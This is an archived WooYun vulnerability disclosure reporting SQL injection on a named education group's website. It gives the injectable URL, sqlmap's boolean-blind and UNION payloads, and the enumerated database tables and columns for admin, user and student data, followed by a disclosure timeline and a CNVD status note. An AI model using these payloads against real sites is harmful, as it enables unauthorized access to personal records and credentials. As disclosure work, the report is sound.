乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
ICON国际教育集团存在SQL注入,可获取管理员信息和用户的信息
注入点:http://www.iconedu.co.uk/school.php?id=3
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3 AND 3933=3933 Type: UNION query Title: MySQL UNION query (80) - 2 columns Payload: id=-3885 UNION ALL SELECT CONCAT(0x717a627871,0x497a73584b6a6b6e4c4e,0x716a706b71),80#---web application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5available databases [2]:[*] information_schema[*] s78mua83003webfusio_689620_db1
表:
[20 tables]+------------------+| employees || groups || host_history || icon_Admin || icon_Indexphoto || icon_News || icon_active || icon_activeback || icon_message || icon_notice || icon_return || icon_schoolinfor || icon_schooltypes || icon_student || login_attempts || offices || rating || readycode || users || users_groups |+------------------+
管理员表的信息
Table: icon_Admin[7 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| AdminID | int(11) || AdminLevel | int(11) || AdminName | varchar(100) || AdminPass | varchar(100) || RegisterTime | timestamp || school | varchar(50) || sources | varchar(100) |+--------------+--------------+
User表包括用户名和密码等信息
Table: users[17 columns]+-------------------------+-----------------------+| Column | Type |+-------------------------+-----------------------+| activation_code | varchar(40) || active | tinyint(1) unsigned || company | varchar(100) || created_on | int(11) unsigned || email | varchar(100) || first_name | varchar(50) || forgotten_password_code | varchar(40) || forgotten_password_time | int(11) unsigned || id | mediumint(8) unsigned || ip_address | varbinary(16) || last_login | int(11) unsigned || last_name | varchar(50) || password | varchar(80) || phone | varchar(20) || remember_code | varchar(40) || salt | varchar(40) || username | varchar(100) |+-------------------------+-----------------------+
Table: icon_student[15 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| backtime | varchar(100) || gotime | varchar(100) || jointime | timestamp || jzname | varchar(100) || jzpwd | varchar(100) || landcount | int(11) || LangType | int(11) || lastlandtime | varchar(50) || pwdlist | varchar(100) || schooltypeid | int(11) || studentid | int(11) || studentname | varchar(100) || studentphoto | varchar(100) || studyaddr | varchar(100) || studycontent | varchar(300) |+--------------+--------------+Student信息Database: s78mua83003webfusio_689620_db1Table: icon_student[167 entries]
危害等级:中
漏洞Rank:10
确认时间:2015-12-02 11:10
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无